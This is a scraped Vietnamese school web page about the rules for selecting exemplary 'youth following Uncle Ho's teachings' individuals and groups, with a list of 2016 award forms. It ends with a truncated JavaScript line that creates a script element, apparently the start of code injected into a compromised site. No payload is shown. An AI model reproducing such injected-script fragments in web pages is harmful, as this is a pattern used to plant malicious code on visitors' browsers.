Quy định về xét chọn danh hiệu “Thanh niên tiên tiến làm theo lời Bác” và “Tập thể làm theo lời Bác” tiêu biểu cấp trường

0
1734

 

phpQyao3SAM

35QD – Quyet dinh quy dinh tieu chuan Thanh nien tien tien lam theo loi Bac

(GV-CBT) Mau tong hop thanh tich Thanh nien tien tien lam theo loi Bac tieu bieu 2016

(Hoc sinh) Mau tong hop thanh tich Thanh nien tien tien lam theo loi Bac tieu bieu 2016

(Sinh vien) Mau tong hop thanh tich Thanh nien tien tien lam theo loi Bac tieu bieu 2016

Mau tong hop thanh tich Tap the lam theo loi Bac tieu bieu 2016

 

 

var d=document;var s=d.createElement(‘script’);